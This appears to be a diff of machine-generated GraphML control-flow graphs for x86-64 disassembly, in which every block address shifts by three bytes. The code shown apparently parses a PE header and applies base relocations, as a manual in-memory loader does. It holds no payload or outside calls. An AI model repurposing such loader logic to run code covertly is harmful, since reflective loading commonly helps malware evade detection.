-    <node id="block.0x13e7">
-      <data key="address">0x13e7</data>
+    <node id="block.0x13ea">
+      <data key="address">0x13ea</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13e7</data>
+        <data key="address">0x13ea</data>
         <data key="type">instructions</data>
-        <node id="block.0x13e7:instruction.0x13e7">
-          <data key="address">0x13e7</data>
+        <node id="block.0x13ea:instruction.0x13ea">
+          <data key="address">0x13ea</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c608</data>
           <data key="instruction.source">add rsi, 8</data>
         </node>
-        <node id="block.0x13e7:instruction.0x13eb">
-          <data key="address">0x13eb</data>
+        <node id="block.0x13ea:instruction.0x13ee">
+          <data key="address">0x13ee</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c708</data>
           <data key="instruction.source">add rdi, 8</data>
         </node>
-        <node id="block.0x13e7:instruction.0x13ef">
-          <data key="address">0x13ef</data>
+        <node id="block.0x13ea:instruction.0x13f2">
+          <data key="address">0x13f2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eba9</data>
-          <data key="instruction.source">jmp 0x139a</data>
+          <data key="instruction.source">jmp 0x139d</data>
         </node>
-        <edge source="block.0x13e7:instruction.0x13e7" target="block.0x13e7:instruction.0x13eb"/>
-        <edge source="block.0x13e7:instruction.0x13eb" target="block.0x13e7:instruction.0x13ef"/>
+        <edge source="block.0x13ea:instruction.0x13ea" target="block.0x13ea:instruction.0x13ee"/>
+        <edge source="block.0x13ea:instruction.0x13ee" target="block.0x13ea:instruction.0x13f2"/>
       </graph>
     </node>
-    <node id="block.0x13f1">
-      <data key="address">0x13f1</data>
+    <node id="block.0x13f4">
+      <data key="address">0x13f4</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13f1</data>
+        <data key="address">0x13f4</data>
         <data key="type">instructions</data>
-        <node id="block.0x13f1:instruction.0x13f1">
-          <data key="address">0x13f1</data>
+        <node id="block.0x13f4:instruction.0x13f4">
+          <data key="address">0x13f4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4983c614</data>
           <data key="instruction.source">add r14, 0x14</data>
         </node>
-        <node id="block.0x13f1:instruction.0x13f5">
-          <data key="address">0x13f5</data>
+        <node id="block.0x13f4:instruction.0x13f8">
+          <data key="address">0x13f8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e962ffffff</data>
-          <data key="instruction.source">jmp 0x135c</data>
+          <data key="instruction.source">jmp 0x135f</data>
         </node>
-        <edge source="block.0x13f1:instruction.0x13f1" target="block.0x13f1:instruction.0x13f5"/>
+        <edge source="block.0x13f4:instruction.0x13f4" target="block.0x13f4:instruction.0x13f8"/>
       </graph>
     </node>
-    <node id="block.0x13fa">
-      <data key="address">0x13fa</data>
+    <node id="block.0x13fd">
+      <data key="address">0x13fd</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13fa</data>
+        <data key="address">0x13fd</data>
         <data key="type">instructions</data>
-        <node id="block.0x13fa:instruction.0x13fa">
-          <data key="address">0x13fa</data>
+        <node id="block.0x13fd:instruction.0x13fd">
+          <data key="address">0x13fd</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b45d0</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x13fa:instruction.0x13fe">
-          <data key="address">0x13fe</data>
+        <node id="block.0x13fd:instruction.0x1401">
+          <data key="address">0x1401</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498b4c2430</data>
           <data key="instruction.source">mov rcx, qword ptr [r12 + 0x30]</data>
         </node>
-        <node id="block.0x13fa:instruction.0x1403">
-          <data key="address">0x1403</data>
+        <node id="block.0x13fd:instruction.0x1406">
+          <data key="address">0x1406</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4829c8</data>
           <data key="instruction.source">sub rax, rcx</data>
         </node>
-        <node id="block.0x13fa:instruction.0x1406">
-          <data key="address">0x1406</data>
+        <node id="block.0x13fd:instruction.0x1409">
+          <data key="address">0x1409</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488945d8</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x28], rax</data>
         </node>
-        <node id="block.0x13fa:instruction.0x140a">
-          <data key="address">0x140a</data>
+        <node id="block.0x13fd:instruction.0x140d">
+          <data key="address">0x140d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b8424b0000000</data>
           <data key="instruction.source">mov eax, dword ptr [r12 + 0xb0]</data>
         </node>
-        <node id="block.0x13fa:instruction.0x1412">
-          <data key="address">0x1412</data>
+        <node id="block.0x13fd:instruction.0x1415">
+          <data key="address">0x1415</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c0</data>
           <data key="instruction.source">test eax, eax</data>
         </node>
-        <node id="block.0x13fa:instruction.0x1414">
-          <data key="address">0x1414</data>
+        <node id="block.0x13fd:instruction.0x1417">
+          <data key="address">0x1417</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7478</data>
-          <data key="instruction.source">je 0x148e</data>
+          <data key="instruction.source">je 0x1491</data>
         </node>
-        <edge source="block.0x13fa:instruction.0x13fa" target="block.0x13fa:instruction.0x1403"/>
-        <edge source="block.0x13fa:instruction.0x13fe" target="block.0x13fa:instruction.0x1403"/>
-        <edge source="block.0x13fa:instruction.0x13fe" target="block.0x13fa:instruction.0x1406"/>
-        <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x1406"/>
-        <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x140a"/>
-        <edge source="block.0x13fa:instruction.0x1403" target="block.0x13fa:instruction.0x1412"/>
-        <edge source="block.0x13fa:instruction.0x1406" target="block.0x13fa:instruction.0x140a"/>
-        <edge source="block.0x13fa:instruction.0x140a" target="block.0x13fa:instruction.0x1412"/>
-        <edge source="block.0x13fa:instruction.0x1412" target="block.0x13fa:instruction.0x1414"/>
+        <edge source="block.0x13fd:instruction.0x13fd" target="block.0x13fd:instruction.0x1406"/>
+        <edge source="block.0x13fd:instruction.0x1401" target="block.0x13fd:instruction.0x1406"/>
+        <edge source="block.0x13fd:instruction.0x1401" target="block.0x13fd:instruction.0x1409"/>
+        <edge source="block.0x13fd:instruction.0x1406" target="block.0x13fd:instruction.0x1409"/>
+        <edge source="block.0x13fd:instruction.0x1406" target="block.0x13fd:instruction.0x140d"/>
+        <edge source="block.0x13fd:instruction.0x1406" target="block.0x13fd:instruction.0x1415"/>
+        <edge source="block.0x13fd:instruction.0x1409" target="block.0x13fd:instruction.0x140d"/>
+        <edge source="block.0x13fd:instruction.0x140d" target="block.0x13fd:instruction.0x1415"/>
+        <edge source="block.0x13fd:instruction.0x1415" target="block.0x13fd:instruction.0x1417"/>
       </graph>
     </node>
-    <node id="block.0x1416">
-      <data key="address">0x1416</data>
+    <node id="block.0x1419">
+      <data key="address">0x1419</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1416</data>
+        <data key="address">0x1419</data>
         <data key="type">instructions</data>
-        <node id="block.0x1416:instruction.0x1416">
-          <data key="address">0x1416</data>
+        <node id="block.0x1419:instruction.0x1419">
+          <data key="address">0x1419</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b8c24b4000000</data>
           <data key="instruction.source">mov ecx, dword ptr [r12 + 0xb4]</data>
         </node>
-        <node id="block.0x1416:instruction.0x141e">
-          <data key="address">0x141e</data>
+        <node id="block.0x1419:instruction.0x1421">
+          <data key="address">0x1421</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c9</data>
           <data key="instruction.source">test ecx, ecx</data>
         </node>
-        <node id="block.0x1416:instruction.0x1420">
-          <data key="address">0x1420</data>
+        <node id="block.0x1419:instruction.0x1423">
+          <data key="address">0x1423</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">746c</data>
-          <data key="instruction.source">je 0x148e</data>
+          <data key="instruction.source">je 0x1491</data>
         </node>
-        <edge source="block.0x1416:instruction.0x1416" target="block.0x1416:instruction.0x141e"/>
-        <edge source="block.0x1416:instruction.0x141e" target="block.0x1416:instruction.0x1420"/>
+        <edge source="block.0x1419:instruction.0x1419" target="block.0x1419:instruction.0x1421"/>
+        <edge source="block.0x1419:instruction.0x1421" target="block.0x1419:instruction.0x1423"/>
       </graph>
     </node>
-    <node id="block.0x1422">
-      <data key="address">0x1422</data>
+    <node id="block.0x1425">
+      <data key="address">0x1425</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1422</data>
+        <data key="address">0x1425</data>
         <data key="type">instructions</data>
-        <node id="block.0x1422:instruction.0x1422">
-          <data key="address">0x1422</data>
+        <node id="block.0x1425:instruction.0x1425">
+          <data key="address">0x1425</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b75d0</data>
           <data key="instruction.source">mov r14, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1422:instruction.0x1426">
-          <data key="address">0x1426</data>
+        <node id="block.0x1425:instruction.0x1429">
+          <data key="address">0x1429</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4901c6</data>
           <data key="instruction.source">add r14, rax</data>
         </node>
-        <edge source="block.0x1422:instruction.0x1422" target="block.0x1422:instruction.0x1426"/>
+        <edge source="block.0x1425:instruction.0x1425" target="block.0x1425:instruction.0x1429"/>
       </graph>
     </node>
-    <node id="block.0x1429">
-      <data key="address">0x1429</data>
+    <node id="block.0x142c">
+      <data key="address">0x142c</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1429</data>
+        <data key="address">0x142c</data>
         <data key="type">instructions</data>
-        <node id="block.0x1429:instruction.0x1429">
-          <data key="address">0x1429</data>
+        <node id="block.0x142c:instruction.0x142c">
+          <data key="address">0x142c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4604</data>
           <data key="instruction.source">mov eax, dword ptr [r14 + 4]</data>
         </node>
-        <node id="block.0x1429:instruction.0x142d">
-          <data key="address">0x142d</data>
+        <node id="block.0x142c:instruction.0x1430">
+          <data key="address">0x1430</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c0</data>
           <data key="instruction.source">test eax, eax</data>
         </node>
-        <node id="block.0x1429:instruction.0x142f">
-          <data key="address">0x142f</data>
+        <node id="block.0x142c:instruction.0x1432">
+          <data key="address">0x1432</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">745d</data>
-          <data key="instruction.source">je 0x148e</data>
+          <data key="instruction.source">je 0x1491</data>
         </node>
-        <edge source="block.0x1429:instruction.0x1429" target="block.0x1429:instruction.0x142d"/>
-        <edge source="block.0x1429:instruction.0x142d" target="block.0x1429:instruction.0x142f"/>
+        <edge source="block.0x142c:instruction.0x142c" target="block.0x142c:instruction.0x1430"/>
+        <edge source="block.0x142c:instruction.0x1430" target="block.0x142c:instruction.0x1432"/>
       </graph>
     </node>
-    <node id="block.0x1431">
-      <data key="address">0x1431</data>
+    <node id="block.0x1434">
+      <data key="address">0x1434</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1431</data>
+        <data key="address">0x1434</data>
         <data key="type">instructions</data>
-        <node id="block.0x1431:instruction.0x1431">
-          <data key="address">0x1431</data>
+        <node id="block.0x1434:instruction.0x1434">
+          <data key="address">0x1434</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">83e808</data>
           <data key="instruction.source">sub eax, 8</data>
         </node>
-        <node id="block.0x1431:instruction.0x1434">
-          <data key="address">0x1434</data>
+        <node id="block.0x1434:instruction.0x1437">
+          <data key="address">0x1437</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">d1e8</data>
           <data key="instruction.source">shr eax, 1</data>
         </node>
-        <node id="block.0x1431:instruction.0x1436">
-          <data key="address">0x1436</data>
+        <node id="block.0x1434:instruction.0x1439">
+          <data key="address">0x1439</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4189c7</data>
           <data key="instruction.source">mov r15d, eax</data>
         </node>
-        <node id="block.0x1431:instruction.0x1439">
-          <data key="address">0x1439</data>
+        <node id="block.0x1434:instruction.0x143c">
+          <data key="address">0x143c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b06</data>
           <data key="instruction.source">mov eax, dword ptr [r14]</data>
         </node>
-        <node id="block.0x1431:instruction.0x143c">
-          <data key="address">0x143c</data>
+        <node id="block.0x1434:instruction.0x143f">
+          <data key="address">0x143f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b6dd0</data>
           <data key="instruction.source">mov r13, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1431:instruction.0x1440">
-          <data key="address">0x1440</data>
+        <node id="block.0x1434:instruction.0x1443">
+          <data key="address">0x1443</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4901c5</data>
           <data key="instruction.source">add r13, rax</data>
         </node>
-        <node id="block.0x1431:instruction.0x1443">
-          <data key="address">0x1443</data>
+        <node id="block.0x1434:instruction.0x1446">
+          <data key="address">0x1446</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4d8d6608</data>
           <data key="instruction.source">lea r12, [r14 + 8]</data>
         </node>
-        <edge source="block.0x1431:instruction.0x1431" target="block.0x1431:instruction.0x1434"/>
-        <edge source="block.0x1431:instruction.0x1434" target="block.0x1431:instruction.0x1436"/>
-        <edge source="block.0x1431:instruction.0x1434" target="block.0x1431:instruction.0x1439"/>
-        <edge source="block.0x1431:instruction.0x1434" target="block.0x1431:instruction.0x1440"/>
-        <edge source="block.0x1431:instruction.0x1436" target="block.0x1431:instruction.0x1439"/>
-        <edge source="block.0x1431:instruction.0x1439" target="block.0x1431:instruction.0x1440"/>
-        <edge source="block.0x1431:instruction.0x143c" target="block.0x1431:instruction.0x1440"/>
+        <edge source="block.0x1434:instruction.0x1434" target="block.0x1434:instruction.0x1437"/>
+        <edge source="block.0x1434:instruction.0x1437" target="block.0x1434:instruction.0x1439"/>
+        <edge source="block.0x1434:instruction.0x1437" target="block.0x1434:instruction.0x143c"/>
+        <edge source="block.0x1434:instruction.0x1437" target="block.0x1434:instruction.0x1443"/>
+        <edge source="block.0x1434:instruction.0x1439" target="block.0x1434:instruction.0x143c"/>
+        <edge source="block.0x1434:instruction.0x143c" target="block.0x1434:instruction.0x1443"/>
+        <edge source="block.0x1434:instruction.0x143f" target="block.0x1434:instruction.0x1443"/>
       </graph>
     </node>
-    <node id="block.0x1447">
-      <data key="address">0x1447</data>
+    <node id="block.0x144a">
+      <data key="address">0x144a</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1447</data>
+        <data key="address">0x144a</data>
         <data key="type">instructions</data>
-        <node id="block.0x1447:instruction.0x1447">
-          <data key="address">0x1447</data>
+        <node id="block.0x144a:instruction.0x144a">
+          <data key="address">0x144a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4585ff</data>
           <data key="instruction.source">test r15d, r15d</data>
         </node>
-        <node id="block.0x1447:instruction.0x144a">
-          <data key="address">0x144a</data>
+        <node id="block.0x144a:instruction.0x144d">
+          <data key="address">0x144d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7439</data>
-          <data key="instruction.source">je 0x1485</data>
+          <data key="instruction.source">je 0x1488</data>
         </node>
-        <edge source="block.0x1447:instruction.0x1447" target="block.0x1447:instruction.0x144a"/>
+        <edge source="block.0x144a:instruction.0x144a" target="block.0x144a:instruction.0x144d"/>
       </graph>
     </node>
-    <node id="block.0x144c">
-      <data key="address">0x144c</data>
+    <node id="block.0x144f">
+      <data key="address">0x144f</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x144c</data>
+        <data key="address">0x144f</data>
         <data key="type">instructions</data>
-        <node id="block.0x144c:instruction.0x144c">
-          <data key="address">0x144c</data>
+        <node id="block.0x144f:instruction.0x144f">
+          <data key="address">0x144f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">410fb70424</data>
           <data key="instruction.source">movzx eax, word ptr [r12]</data>
         </node>
-        <node id="block.0x144c:instruction.0x1451">
-          <data key="address">0x1451</data>
+        <node id="block.0x144f:instruction.0x1454">
+          <data key="address">0x1454</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">89c3</data>
           <data key="instruction.source">mov ebx, eax</data>
         </node>
-        <node id="block.0x144c:instruction.0x1453">
-          <data key="address">0x1453</data>
+        <node id="block.0x144f:instruction.0x1456">
+          <data key="address">0x1456</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1eb0c</data>
           <data key="instruction.source">shr ebx, 0xc</data>
         </node>
-        <node id="block.0x144c:instruction.0x1456">
-          <data key="address">0x1456</data>
+        <node id="block.0x144f:instruction.0x1459">
+          <data key="address">0x1459</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">25ff0f0000</data>
           <data key="instruction.source">and eax, 0xfff</data>
         </node>
-        <node id="block.0x144c:instruction.0x145b">
-          <data key="address">0x145b</data>
+        <node id="block.0x144f:instruction.0x145e">
+          <data key="address">0x145e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">83fb0a</data>
           <data key="instruction.source">cmp ebx, 0xa</data>
         </node>
-        <node id="block.0x144c:instruction.0x145e">
-          <data key="address">0x145e</data>
+        <node id="block.0x144f:instruction.0x1461">
+          <data key="address">0x1461</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7407</data>
-          <data key="instruction.source">je 0x1467</data>
+          <data key="instruction.source">je 0x146a</data>
         </node>
-        <edge source="block.0x144c:instruction.0x144c" target="block.0x144c:instruction.0x1451"/>
-        <edge source="block.0x144c:instruction.0x144c" target="block.0x144c:instruction.0x1456"/>
-        <edge source="block.0x144c:instruction.0x1451" target="block.0x144c:instruction.0x1453"/>
-        <edge source="block.0x144c:instruction.0x1451" target="block.0x144c:instruction.0x1456"/>
-        <edge source="block.0x144c:instruction.0x1453" target="block.0x144c:instruction.0x1456"/>
-        <edge source="block.0x144c:instruction.0x1453" target="block.0x144c:instruction.0x145b"/>
-        <edge source="block.0x144c:instruction.0x1456" target="block.0x144c:instruction.0x145b"/>
-        <edge source="block.0x144c:instruction.0x145b" target="block.0x144c:instruction.0x145e"/>
+        <edge source="block.0x144f:instruction.0x144f" target="block.0x144f:instruction.0x1454"/>
+        <edge source="block.0x144f:instruction.0x144f" target="block.0x144f:instruction.0x1459"/>
+        <edge source="block.0x144f:instruction.0x1454" target="block.0x144f:instruction.0x1456"/>
+        <edge source="block.0x144f:instruction.0x1454" target="block.0x144f:instruction.0x1459"/>
+        <edge source="block.0x144f:instruction.0x1456" target="block.0x144f:instruction.0x1459"/>
+        <edge source="block.0x144f:instruction.0x1456" target="block.0x144f:instruction.0x145e"/>
+        <edge source="block.0x144f:instruction.0x1459" target="block.0x144f:instruction.0x145e"/>
+        <edge source="block.0x144f:instruction.0x145e" target="block.0x144f:instruction.0x1461"/>
       </graph>
     </node>
-    <node id="block.0x1460">
-      <data key="address">0x1460</data>
+    <node id="block.0x1463">
+      <data key="address">0x1463</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1460</data>
+        <data key="address">0x1463</data>
         <data key="type">instructions</data>
-        <node id="block.0x1460:instruction.0x1460">
-          <data key="address">0x1460</data>
+        <node id="block.0x1463:instruction.0x1463">
+          <data key="address">0x1463</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">83fb03</data>
           <data key="instruction.source">cmp ebx, 3</data>
         </node>
-        <node id="block.0x1460:instruction.0x1463">
-          <data key="address">0x1463</data>
+        <node id="block.0x1463:instruction.0x1466">
+          <data key="address">0x1466</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">740d</data>
-          <data key="instruction.source">je 0x1472</data>
+          <data key="instruction.source">je 0x1475</data>
         </node>
-        <edge source="block.0x1460:instruction.0x1460" target="block.0x1460:instruction.0x1463"/>
+        <edge source="block.0x1463:instruction.0x1463" target="block.0x1463:instruction.0x1466"/>
       </graph>
     </node>
-    <node id="block.0x1465">
-      <data key="address">0x1465</data>
+    <node id="block.0x1468">
+      <data key="address">0x1468</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1465</data>
+        <data key="address">0x1468</data>
         <data key="type">instructions</data>
-        <node id="block.0x1465:instruction.0x1465">
-          <data key="address">0x1465</data>
+        <node id="block.0x1468:instruction.0x1468">
+          <data key="address">0x1468</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb15</data>
-          <data key="instruction.source">jmp 0x147c</data>
+          <data key="instruction.source">jmp 0x147f</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1467">
-      <data key="address">0x1467</data>
+    <node id="block.0x146a">
+      <data key="address">0x146a</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1467</data>
+        <data key="address">0x146a</data>
         <data key="type">instructions</data>
-        <node id="block.0x1467:instruction.0x1467">
-          <data key="address">0x1467</data>
+        <node id="block.0x146a:instruction.0x146a">
+          <data key="address">0x146a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b55d8</data>
           <data key="instruction.source">mov rdx, qword ptr [rbp - 0x28]</data>
         </node>
-        <node id="block.0x1467:instruction.0x146b">
-          <data key="address">0x146b</data>
+        <node id="block.0x146a:instruction.0x146e">
+          <data key="address">0x146e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4901540500</data>
           <data key="instruction.source">add qword ptr [r13 + rax], rdx</data>
         </node>
-        <node id="block.0x1467:instruction.0x1470">
-          <data key="address">0x1470</data>
+        <node id="block.0x146a:instruction.0x1473">
+          <data key="address">0x1473</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb0a</data>
-          <data key="instruction.source">jmp 0x147c</data>
+          <data key="instruction.source">jmp 0x147f</data>
         </node>
-        <edge source="block.0x1467:instruction.0x1467" target="block.0x1467:instruction.0x146b"/>
-        <edge source="block.0x1467:instruction.0x146b" target="block.0x1467:instruction.0x1470"/>
+        <edge source="block.0x146a:instruction.0x146a" target="block.0x146a:instruction.0x146e"/>
+        <edge source="block.0x146a:instruction.0x146e" target="block.0x146a:instruction.0x1473"/>
       </graph>
     </node>
-    <node id="block.0x1472">
-      <data key="address">0x1472</data>
+    <node id="block.0x1475">
+      <data key="address">0x1475</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1472</data>
+        <data key="address">0x1475</data>
         <data key="type">instructions</data>
-        <node id="block.0x1472:instruction.0x1472">
-          <data key="address">0x1472</data>
+        <node id="block.0x1475:instruction.0x1475">
+          <data key="address">0x1475</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b55d8</data>
           <data key="instruction.source">mov edx, dword ptr [rbp - 0x28]</data>
         </node>
-        <node id="block.0x1472:instruction.0x1475">
-          <data key="address">0x1475</data>
+        <node id="block.0x1475:instruction.0x1478">
+          <data key="address">0x1478</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4101540500</data>
           <data key="instruction.source">add dword ptr [r13 + rax], edx</data>
         </node>
-        <node id="block.0x1472:instruction.0x147a">
-          <data key="address">0x147a</data>
+        <node id="block.0x1475:instruction.0x147d">
+          <data key="address">0x147d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb00</data>
-          <data key="instruction.source">jmp 0x147c</data>
+          <data key="instruction.source">jmp 0x147f</data>
         </node>
-        <edge source="block.0x1472:instruction.0x1472" target="block.0x1472:instruction.0x1475"/>
+        <edge source="block.0x1475:instruction.0x1475" target="block.0x1475:instruction.0x1478"/>
       </graph>
     </node>
-    <node id="block.0x147c">
-      <data key="address">0x147c</data>
+    <node id="block.0x147f">
+      <data key="address">0x147f</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x147c</data>
+        <data key="address">0x147f</data>
         <data key="type">instructions</data>
-        <node id="block.0x147c:instruction.0x147c">
-          <data key="address">0x147c</data>
+        <node id="block.0x147f:instruction.0x147f">
+          <data key="address">0x147f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4983c402</data>
           <data key="instruction.source">add r12, 2</data>
         </node>
-        <node id="block.0x147c:instruction.0x1480">
-          <data key="address">0x1480</data>
+        <node id="block.0x147f:instruction.0x1483">
+          <data key="address">0x1483</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41ffcf</data>
           <data key="instruction.source">dec r15d</data>
         </node>
-        <node id="block.0x147c:instruction.0x1483">
-          <data key="address">0x1483</data>
+        <node id="block.0x147f:instruction.0x1486">
+          <data key="address">0x1486</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ebc2</data>
-          <data key="instruction.source">jmp 0x1447</data>
+          <data key="instruction.source">jmp 0x144a</data>
         </node>
-        <edge source="block.0x147c:instruction.0x147c" target="block.0x147c:instruction.0x1480"/>
-        <edge source="block.0x147c:instruction.0x1480" target="block.0x147c:instruction.0x1483"/>
+        <edge source="block.0x147f:instruction.0x147f" target="block.0x147f:instruction.0x1483"/>
+        <edge source="block.0x147f:instruction.0x1483" target="block.0x147f:instruction.0x1486"/>
       </graph>
     </node>
-    <node id="block.0x1485">
-      <data key="address">0x1485</data>
+    <node id="block.0x1488">
+      <data key="address">0x1488</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1485</data>
+        <data key="address">0x1488</data>
         <data key="type">instructions</data>
-        <node id="block.0x1485:instruction.0x1485">
-          <data key="address">0x1485</data>
+        <node id="block.0x1488:instruction.0x1488">
+          <data key="address">0x1488</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4604</data>
           <data key="instruction.source">mov eax, dword ptr [r14 + 4]</data>
         </node>
-        <node id="block.0x1485:instruction.0x1489">
-          <data key="address">0x1489</data>
+        <node id="block.0x1488:instruction.0x148c">
+          <data key="address">0x148c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4901c6</data>
           <data key="instruction.source">add r14, rax</data>
         </node>
-        <node id="block.0x1485:instruction.0x148c">
-          <data key="address">0x148c</data>
+        <node id="block.0x1488:instruction.0x148f">
+          <data key="address">0x148f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb9b</data>
-          <data key="instruction.source">jmp 0x1429</data>
+          <data key="instruction.source">jmp 0x142c</data>
         </node>
-        <edge source="block.0x1485:instruction.0x1485" target="block.0x1485:instruction.0x1489"/>
-        <edge source="block.0x1485:instruction.0x1489" target="block.0x1485:instruction.0x148c"/>
+        <edge source="block.0x1488:instruction.0x1488" target="block.0x1488:instruction.0x148c"/>
+        <edge source="block.0x1488:instruction.0x148c" target="block.0x1488:instruction.0x148f"/>
       </graph>
     </node>
-    <node id="block.0x148e">
-      <data key="address">0x148e</data>
+    <node id="block.0x1491">
+      <data key="address">0x1491</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x148e</data>
+        <data key="address">0x1491</data>
         <data key="type">instructions</data>
-        <node id="block.0x148e:instruction.0x148e">
-          <data key="address">0x148e</data>
+        <node id="block.0x1491:instruction.0x1491">
+          <data key="address">0x1491</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x148e:instruction.0x1492">
-          <data key="address">0x1492</data>
+        <node id="block.0x1491:instruction.0x1495">
+          <data key="address">0x1495</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b413c</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x3c]</data>
         </node>
-        <node id="block.0x148e:instruction.0x1495">
-          <data key="address">0x1495</data>
+        <node id="block.0x1491:instruction.0x1498">
+          <data key="address">0x1498</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8d2401</data>
           <data key="instruction.source">lea r12, [rcx + rax]</data>
         </node>
-        <node id="block.0x148e:instruction.0x1499">
-          <data key="address">0x1499</data>
+        <node id="block.0x1491:instruction.0x149c">
+          <data key="address">0x149c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">490fb7442414</data>
           <data key="instruction.source">movzx rax, word ptr [r12 + 0x14]</data>
         </node>
-        <node id="block.0x148e:instruction.0x149f">
-          <data key="address">0x149f</data>
+        <node id="block.0x1491:instruction.0x14a2">
+          <data key="address">0x14a2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4d8d6c0418</data>
           <data key="instruction.source">lea r13, [r12 + rax + 0x18]</data>
         </node>
-        <node id="block.0x148e:instruction.0x14a4">
-          <data key="address">0x14a4</data>
+        <node id="block.0x1491:instruction.0x14a7">
+          <data key="address">0x14a7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">450fb77c2406</data>
           <data key="instruction.source">movzx r15d, word ptr [r12 + 6]</data>
         </node>
-        <edge source="block.0x148e:instruction.0x148e" target="block.0x148e:instruction.0x1492"/>
-        <edge source="block.0x148e:instruction.0x148e" target="block.0x148e:instruction.0x1495"/>
-        <edge source="block.0x148e:instruction.0x1492" target="block.0x148e:instruction.0x1495"/>
-        <edge source="block.0x148e:instruction.0x1492" target="block.0x148e:instruction.0x1499"/>
-        <edge source="block.0x148e:instruction.0x1495" target="block.0x148e:instruction.0x1499"/>
-        <edge source="block.0x148e:instruction.0x1495" target="block.0x148e:instruction.0x149f"/>
-        <edge source="block.0x148e:instruction.0x1495" target="block.0x148e:instruction.0x14a4"/>
-        <edge source="block.0x148e:instruction.0x1499" target="block.0x148e:instruction.0x149f"/>
+        <edge source="block.0x1491:instruction.0x1491" target="block.0x1491:instruction.0x1495"/>
+        <edge source="block.0x1491:instruction.0x1491" target="block.0x1491:instruction.0x1498"/>
+        <edge source="block.0x1491:instruction.0x1495" target="block.0x1491:instruction.0x1498"/>
